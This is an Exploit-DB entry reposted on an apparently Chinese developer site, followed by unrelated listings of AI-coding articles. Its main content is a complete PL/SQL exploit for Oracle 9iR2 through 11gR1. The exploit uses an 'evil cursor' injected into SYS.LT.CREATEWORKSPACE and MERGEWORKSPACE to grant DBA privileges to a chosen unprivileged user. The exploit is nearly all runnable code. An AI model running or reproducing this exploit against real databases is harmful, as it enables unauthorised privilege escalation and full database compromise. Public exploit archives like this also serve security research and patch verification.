###############################

# EDB-ID: 10264

# CVE-ID: ()

# Title: Oracle SYS.LT.MERGEWORKSPACE Evil Cursor Exploit

# Author: Andrea "bunker" Purificato

# Published: 2009-12-01

# Download Exploit Code

# Download N/A

###############################

--

-- sys-lt-mergeworkspaceV2.sql

--

--

-- Oracle SYS.LT.MERGEWORKSPACE exploit (9iR2/10gR1,10gR2,11gR1)

-- Evil cursor technique

--

-- Grant dba permission to unprivileged user

--

--

-- REF: http://www.google.it/search?q=SYS.LT.MERGEWORKSPACE

--

-- AUTHOR: Andrea "bunker" Purificato

-- http://rawlab.mindcreations.com

--

--

set serveroutput on;

prompt [+] sys-lt-mergeworkspaceV2.sql exploit

prompt [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com

prompt [+] 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2

prompt

undefine the_user;

accept the_user char prompt 'Target username (default TEST): ' default 'TEST';

prompt

prompt [-] Creating evil cursor...

DECLARE

MYC NUMBER;

BEGIN

MYC := DBMS_SQL.OPEN_CURSOR;

DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction;begin execute immediate ''GRANT DBA TO &the_user'';commit;end;',0);

SYS.LT.CREATEWORKSPACE('x''||dbms_sql.execute('||MYC||')||''--');

SYS.LT.MERGEWORKSPACE('x''||dbms_sql.execute('||MYC||')||''--');

END;

/

prompt [-] YOU GOT THE POWAH!!

Logo
https://edu.csdn.net/learn/39067/627173?utm_source=2019755004

汇聚全球AI编程工具,助力开发者即刻编程。

更多推荐

2026年度免费AI编程助手深度评测:从提效工具到全栈智能体

本文深度解析2026年主流“免费”AI编程助手,旨在为开发者提供高价值选型建议。基于 GitHub Octoverse 2025 数据,全球 42% 的生产代码已由 AI 辅助生成,而 Gartner 预测到 2026 年底,企业级 AI 智能体采用率将从 5% 激增至 40%。

avatar AI编程社区
cover

Claude团队内部秘籍曝光!AI编程效率翻倍的10个实战技巧

avatar AI编程社区

AI编程实测-上下文衰减问题及解决方案

一开始,让AI生成基础框架,还行。数据模型不统一:前面用SwiftUI的@State,后面突然变成Combine架构混乱:一开始说用MVVM,到后面代码全写在ViewController里命名不一致:同样的概念,AI一会儿叫"userId",一会儿叫"user_id"重复造轮子:AI忘了前面已经实现了某个功能,又写了一遍偏离设计决策:之前说用Core Data,后面AI用了UserDefaults

avatar AI编程社区